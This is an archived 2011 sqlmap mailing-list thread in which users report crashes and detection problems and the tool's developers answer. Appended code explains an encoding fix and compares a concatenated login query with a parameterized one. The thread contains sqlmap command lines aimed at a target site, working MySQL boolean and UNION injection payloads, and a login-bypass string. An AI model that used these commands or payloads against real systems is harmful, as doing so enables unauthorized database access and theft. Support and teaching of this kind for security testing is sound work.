>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
>>     result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
>>     value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
>>     value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
>>     output = unionUse(expression, unpack=unpack, dump=dump)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
>>     value = __oneShotUnionUse(expression, unpack)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
>>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
>>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage
>>     return Connect.__getPageProxy(**kwargs)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy
>>     return Connect.getPage(**kwargs)
>>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
>>     raise sqlmapConnectionException, warnMsg
>> sqlmapConnectionException: connection timed out to the target url or proxy
>>
>> [04:53:55] [WARNING] no table(s) found
>> tables: '{}'
>>
>> [04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\
>>
>> [*] shutting down at: 04:53:55
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 06:00:15
|
hi nightman.

well, it's not really a bug:
"[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)"

i know that you've already used low number of threads (3) but it seems that you have some connection issues with your host. so, i am not sure how we could help :)

kr

On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote:
> This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;)
>
> sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database
>
> Place: GET
> Parameter: s
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 1 to 10 columns
>     Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693
> ---
>
> [04:52:32] [INFO] manual usage of GET payloads requires url encoding
> [04:52:32] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 4.4.0, Apache 1.3.33
> back-end DBMS: MySQL 4
> [04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\common-tables.txt'
> [04:52:32] [INFO] adding words used on web page to the check list
> please enter number of threads? [Enter for 1 (current)] 3
> [04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
> [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
> [04:53:38] [INFO] tried 88/3452 items (3%)
> [04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only
> Exception in thread 1:
> Traceback (most recent call last):
>   File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
>     self.run()
>   File "C:\Python27\lib\threading.py", line 485, in run
>     self.__target(*self.__args, **self.__kwargs)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
>     result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
>     value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
>     value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
>     value = __oneShotUnionUse(expression, unpack)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
>     raise sqlmapConnectionException, warnMsg
> sqlmapConnectionException: unable to connect to the target url or proxy
>
> Exception in thread 2:
> Traceback (most recent call last):
>   File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
>     self.run()
>   File "C:\Python27\lib\threading.py", line 485, in run
>     self.__target(*self.__args, **self.__kwargs)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
>     result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
>     value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
>     value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
>     value = __oneShotUnionUse(expression, unpack)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True, raise404=False)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage
>     return Connect.__getPageProxy(**kwargs)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy
>     return Connect.getPage(**kwargs)
>   File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
>     raise sqlmapConnectionException, warnMsg
> sqlmapConnectionException: connection timed out to the target url or proxy
>
> [04:53:55] [WARNING] no table(s) found
> tables: '{}'
>
> [04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\
>
> [*] shutting down at: 04:53:55

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 05:54:59
|
hi Kirill.

Thank you for your report and find it fixed in the last commit.

Kr

On Tue, Jun 7, 2011 at 12:47 AM, Kirill Morozov <l0...@l0...> wrote:
>
> [02:45:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4027), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4027)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -m target.txt --random-agent --batch
> Technique: None
> Back-end DBMS: Microsoft Access (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/root/sqlmap-dev/lib/controller/controller.py", line 424, in start
>     elif not checkDynParam(place, parameter, value):
>   File "/root/sqlmap-dev/lib/controller/checks.py", line 642, in checkDynParam
>     dynResult = Request.queryPage(payload, place, raise404=False)
>   File "/root/sqlmap-dev/lib/request/connect.py", line 608, in queryPage
>     return comparison(page, getRatioValue, pageLength)
>   File "/root/sqlmap-dev/lib/request/comparison.py", line 77, in comparison
>     seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING)
> UnicodeEncodeError: 'latin-1' codec can't encode character u'\u2019' in position 28004: ordinal not in range(256)
> --
> Kirill Morozov
> KIMO2-RIPE, RHCE

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
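The failure mode in Kirill's traceback, as an added example (not sqlmap's code and not the fix from the commit mentioned above): a page declared as latin-1 that contains U+2019 cannot be encoded strictly, so this sketch tries the declared charset, then cp1252, then UTF-8 before computing a similarity ratio. `encode_page`, `page_ratio`, `strict_encode_fails` and the sample pages are assumptions made for the illustration.

```python
import codecs
from difflib import SequenceMatcher

# Canonical Python name of the codec named in the traceback ('latin-1').
LATIN1 = codecs.lookup("latin-1").name

# Constructed sample pages; U+2019 is the character from the reported error.
PAGE_TRUE = "<p>Kirill\u2019s page: 3 results</p>"
PAGE_FALSE = "<p>Kirill\u2019s page: no results</p>"


def strict_encode_fails(text, declared="latin-1"):
    """True when text.encode(declared) raises, as in the reported traceback."""
    try:
        text.encode(declared)
    except UnicodeEncodeError:
        return True
    return False


def encode_page(text, declared="latin-1"):
    """Encode a decoded page without raising; return (bytes, codec_used)."""
    candidates = []
    try:
        name = codecs.lookup(declared).name
    except LookupError:
        name = None  # unknown charset label sent by the server
    if name is not None:
        candidates.append(name)
        if name == LATIN1:
            # Pages labelled ISO-8859-1 are very often Windows-1252,
            # where U+2019 is the single byte 0x92.
            candidates.append("cp1252")
    for codec in candidates:
        try:
            return text.encode(codec), codec
        except UnicodeEncodeError:
            continue
    # Last resort: UTF-8, replacing anything it cannot represent
    # (lone surrogates) instead of raising.
    return text.encode("utf-8", errors="replace"), "utf-8"


def page_ratio(first, second, declared="latin-1"):
    """Similarity ratio of two pages, computed on bytes in one common encoding."""
    a, codec_a = encode_page(first, declared)
    b, codec_b = encode_page(second, declared)
    if codec_a != codec_b:
        # Different fallbacks were needed: re-encode both the same way so the
        # ratio does not measure an encoding difference.
        a = first.encode("utf-8", errors="replace")
        b = second.encode("utf-8", errors="replace")
    return SequenceMatcher(None, a, b).ratio()


if __name__ == "__main__":
    print("strict latin-1 encode fails:", strict_encode_fails(PAGE_TRUE))
    print("fallback used:", encode_page(PAGE_TRUE)[1])
    print("ratio: %.3f" % page_ratio(PAGE_TRUE, PAGE_FALSE))
```

The cp1252 step mirrors how browsers treat the ISO-8859-1 label; a comparison engine that must match the server's bytes exactly would need to keep the raw response instead of re-encoding.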
From: <nig...@em...> - 2011-06-07 03:21:09
|
This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;)

sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database

Place: GET
Parameter: s
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693
---

[04:52:32] [INFO] manual usage of GET payloads requires url encoding
[04:52:32] [INFO] the back-end DBMS is MySQL

web application technology: PHP 4.4.0, Apache 1.3.33
back-end DBMS: MySQL 4
[04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\common-tables.txt'
[04:52:32] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 3
[04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
[04:53:38] [INFO] tried 88/3452 items (3%)
[04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only
Exception in thread 1:
Traceback (most recent call last):
  File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
    self.run()
  File "C:\Python27\lib\threading.py", line 485, in run
    self.__target(*self.__args, **self.__kwargs)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
    result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
    value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
    value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
    value = __oneShotUnionUse(expression, unpack)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
    raise sqlmapConnectionException, warnMsg
sqlmapConnectionException: unable to connect to the target url or proxy

Exception in thread 2:
Traceback (most recent call last):
  File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner
    self.run()
  File "C:\Python27\lib\threading.py", line 485, in run
    self.__target(*self.__args, **self.__kwargs)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread
    result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName)))
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression
    value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=expectingNone)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue
    value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse
    value = __oneShotUnionUse(expression, unpack)
  File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage
    return Connect.__getPageProxy(**kwargs)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy
    return Connect.getPage(**kwargs)
  File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage
    raise sqlmapConnectionException, warnMsg
sqlmapConnectionException: connection timed out to the target url or proxy

[04:53:55] [WARNING] no table(s) found
tables: '{}'

[04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\

[*] shutting down at: 04:53:55
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-06 23:26:42
|
Matt,

About your point a), sqlmap did not identify the OR-based Boolean-based injection because these are not tested at detection phase by default. You need to increase --risk 3 and --level value to appropriate one. Please, refer to the users manual for further details. These two switches are mandatory to understand in order to take the best out of sqlmap.

Bernardo Damele A. G.

This message was sent from a smartphone

On 6 Jun 2011, at 11:21, Miroslav Stampar <mir...@gm...> wrote:
> appendix:
>
> "When I get in, I can't extract data. I can get verification that I'm a DBA, but little to nothing else"
> and
> "why I would get no data returned?"
>
> for all of you who experience these symptoms here and there, there are two possibilities:
> a) there is something actually wrong with sqlmap and please refer to the last mail what to do to help us out
> b) queries are filtered by some kind of WAF (e.g. @@version works but everything else fails)
>
> kr
>
> On Mon, Jun 6, 2011 at 12:11 PM, Miroslav Stampar <mir...@gm...> wrote:
>> hi Matt
>>
>> On Sat, Jun 4, 2011 at 10:47 PM, Matt Gardenghi <mtg...@gm...> wrote:
>>> Hello,
>>>
>>> I've been testing a non-production app from a black-box perspective. The only SQLi I've found is from the login page. I can bypass the login by dropping something like: 1' or 1=1-- into the password field. Unfortunately, sqlmap doesn't find this vulnerability. Well, that's not quite true. I eventually, dumped my Burp proxy log into a file and had sqlmap target it. The POST file is icky (IIS7.5 ASP and tons of weird data running around). Still after repeated tests, sqlmap eventually found this vulnerability as a time based SQLi.
>>>
>>> I don't understand why sqlmap cannot locate the vulnerability via the stacked query or simply that it bypasses the login page. When I get in, I can't extract data. I can get verification that I'm a DBA, but little to nothing else. With --sql-shell, I can run 'SELECT @@version' and sqlmap returns a blank data set; if the query is bogus, it returns an error. So, for some reason, no data is returned.
>>> Would anyone be able to give me some pointers on a) why sqlmap doesn't see this injection properly, and b) why I would get no data returned?
>>
>> no problem.
>>
>> in this kind of situations rule of thumb goes like this:
>> 1) try to exploit it manually
>> 2) if you succeed in 1) then please report back and we'll be more than happy to make a fix
>> 3) if you don't succeed with 1) then please collect as much data as you can with -v 3 and -t traffic.txt, inspect it yourself and try to find something that could explain the faulty sqlmap's behavior
>> 4) if you are not very skillful with 2) or 3) you can always send some more data (traffic.txt, debug output of -v 3, target url) privately via email
>>
>> kr
>>
>> p.s. personally, i admire people that do 1) and 2) by themself and report back.
>>
>>> Thanks,
>>>
>>> --
>>> Matt Gardenghi
>>
>> --
>> Miroslav Stampar
>>
>> E-mail: miroslav.stampar (at) gmail.com
>> PGP Key ID: 0xB5397B1B
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
|
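The login bypass Matt describes, seen from the application side, as an added example (not code from the thread): the same `1' or 1=1--` password value against a login query built by string concatenation and against a parameterized one. The table layout, function names, credentials and the use of SQLite (the application in the thread is ASP on IIS) are assumptions.

```python
import sqlite3

# The value from Matt's message, typed into the password field.
BYPASS_VALUE = "1' or 1=1--"


def make_db():
    """In-memory database with constructed accounts.

    Plaintext passwords keep the example short; a real application stores
    salted password hashes and compares those.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
    db.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("matt", "hunter2")],
    )
    return db


def build_concatenated_query(name, password):
    """Vulnerable form: user input becomes part of the SQL text itself."""
    return (
        "SELECT COUNT(*) FROM users WHERE name = '%s' AND password = '%s'"
        % (name, password)
    )


def login_concatenated(db, name, password):
    """Login check using the concatenated query (the 'before')."""
    return db.execute(build_concatenated_query(name, password)).fetchone()[0] > 0


def login_parameterized(db, name, password):
    """Login check with bound parameters (the 'after').

    The driver passes both values as data, so quotes and comment markers in
    them are compared literally and never parsed as SQL.
    """
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?",
        (name, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    db = make_db()
    # With the value from the thread the WHERE clause becomes
    #   name = 'admin' AND password = '1' or 1=1--'
    # which is true for every row, so the check passes without a password.
    print(build_concatenated_query("admin", BYPASS_VALUE))
    print("concatenated :", login_concatenated(db, "admin", BYPASS_VALUE))
    print("parameterized:", login_parameterized(db, "admin", BYPASS_VALUE))
    print("real password:", login_parameterized(db, "admin", "S3cret!"))
```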